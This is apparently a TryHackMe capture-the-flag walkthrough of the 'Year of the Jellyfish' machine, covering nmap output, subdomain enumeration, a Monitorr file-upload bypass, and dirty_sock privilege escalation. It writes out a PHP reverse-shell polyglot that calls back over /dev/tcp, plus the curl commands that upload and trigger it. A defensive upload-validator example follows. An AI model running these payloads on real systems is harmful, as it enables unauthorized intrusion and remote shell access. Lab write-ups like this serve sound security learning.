Year Of JellyFish TryHackMe

Year Of JellyFish TryHackMe Walkthrough

 

 

Nmap Scan

 Nmap scan report for ec2-54-154-149-95.eu-west-1.compute.amazonaws.com (54.154.149.95)  
 Host is up (0.21s latency).  
 Not shown: 995 filtered ports  
 PORT   STATE SERVICE VERSION  
 21/tcp  open ftp   vsftpd 3.0.3  
 22/tcp  open ssh   OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |_ 2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)  
 80/tcp  open http   Apache httpd 2.4.29  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Did not follow redirect to https://robyns-petshop.thm/  
 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Robyn's Pet Shop  
 | ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm  
 | Issuer: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-04-25T12:55:33  
 | Not valid after: 2022-04-25T12:55:33  
 | MD5:  5e00 d923 e57a 0805 8112 1ba9 3492 fcc5  
 |_SHA-1: 7038 42c1 5c02 fa73 3064 ac31 fd42 1443 50e3 68fe  
 |_ssl-date: TLS randomness does not represent time  
 | tls-alpn:   
 |_ http/1.1  
 8000/tcp open http-alt  
 | fingerprint-strings:   
 |  GenericLines:   
 |   HTTP/1.1 400 Bad Request  
 |   Content-Length: 15  
 |_  Request  
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
 SF-Port8000-TCP:V=7.91%I=7%D=4/25%Time=6085673A%P=x86_64-pc-linux-gnu%r(Ge  
 SF:nericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x2  
 SF:015\r\n\r\n400\x20Bad\x20Request");  
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  
 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete  
 No OS matches for host  
 Uptime guess: 23.288 days (since Fri Apr 2 11:32:36 2021)  
 TCP Sequence Prediction: Difficulty=264 (Good luck!)  
 IP ID Sequence Generation: All zeros  
 Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  



Enumeration

If you look at the Nmap result, or at the TLS certificate itself, you can find these

subdomains:




robyns-petshop.thm

monitorr.robyns-petshop.thm

beta.robyns-petshop.thm

dev.robyns-petshop.thm


Then add them to your /etc/hosts file.

robyns-petshop.thm
Pico from GitHub? Okay.



monitorr.robyns-petshop.thm

https://www.exploit-db.com/exploits/48980
 
 
 Sounds Good :)
 
 
 
 
 
But this exploit did not work as-is. After analyzing it, I found how it works, and it is pretty simple.
  
Then I uploaded our shell via curl (in GIF format, to bypass the WAF/filter mentioned on exploit-db). The first time it did not work. After looking in the cookie editor, I saw that this site sets a

cookie value (isHuman=1). I then set that cookie value in curl, uploaded the shell (a PHP shell with a GIF magic number), and got back a reverse connection.
 
 
If you do not understand this exploit, read the simple Python code at https://www.exploit-db.com/exploits/48980.
COMMANDS TO GET INITIAL SHELL

 
 
echo -e $'\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system("bash -c \'bash -i >& /dev/tcp/10.9.20.61/80 0>&1\'");' > shell.png.pHp

curl -k -F "fileToUpload=@./shell.png.pHp" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "Cookie: isHuman=1"  

curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/shell.png.php  
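The upload bypass above works because the filter trusts the image magic number and does not judge the real file extension. The validator below is an added example, not code from the original post or from Monitorr, showing the server-side checks that would reject such a polyglot: it takes the last extension case-insensitively, refuses double extensions, verifies the magic number against the claimed type, and scans the body for script tags; the file names and the sample payload are constructed.

```python
import re

# Magic numbers for the image types the upload is meant to accept.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
}

# PHP open tags (<?php, <?=) or a <script> tag anywhere in the body, case-insensitive.
SCRIPT_MARKERS = re.compile(rb"<\?(php|=)|<script", re.IGNORECASE)

# Constructed sample: a valid PNG signature followed by a harmless PHP tag,
# the same shape as the shell.png.pHp polyglot used in the walkthrough.
POLYGLOT = IMAGE_MAGIC["png"] + b"<?php echo 'hello'; ?>"


def check_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason). Checks run in order and stop at the first failure."""
    # 1. Judge the LAST extension, lower-cased: shell.png.pHp is "php", not "png".
    name = filename.lower()
    if "." not in name:
        return False, "no extension"
    stem, ext = name.rsplit(".", 1)
    if ext not in IMAGE_MAGIC:
        return False, "extension not allowed"
    # 2. Double extensions (cat.png.gif) are never needed for an image upload.
    if "." in stem:
        return False, "multiple extensions"
    # 3. The magic number must match the type the extension claims.
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, "magic number mismatch"
    # 4. A correct signature does not prove the file is only an image: look for
    #    server-side script markers in the rest of the body.
    if SCRIPT_MARKERS.search(data):
        return False, "script content inside image"
    return True, "ok"


if __name__ == "__main__":
    clean_png = IMAGE_MAGIC["png"] + b"\x00" * 16
    for name in ("shell.png.pHp", "shell.pHp", "shell.png", "avatar.png"):
        body = POLYGLOT if name.startswith("shell") else clean_png
        print(name, check_upload(name, body))
```

Even with these checks, accepted files should be stored outside the web root, or in a directory where the web server has script execution disabled, so that a file that slips through is never interpreted as PHP.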

 

 

initial shell

FLAG1.TXT



PRIVILEGE ESCALATION


I always use LinPEAS/LinEnum for privilege escalation, but this time I did not get any interesting output. I found some hashes, but they were not useful.


So I used Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester

I ran this script and it found a lot of exploits. I tried dirty_sock! A few weeks ago I also did the dirty_sock

privilege escalation exploit on HTB. I don't know the machine name; if you know it, comment below :)


Download the dirty_sock exploit:

wget https://github.com/initstring/dirty_sock/archive/master.zip



Run the exploit.


Now it looks like an easy machine, but it has a lot of rabbit holes.


Don't Try Harder!

Enumerate Harder!!

Understanding The Exploit is what matters :)
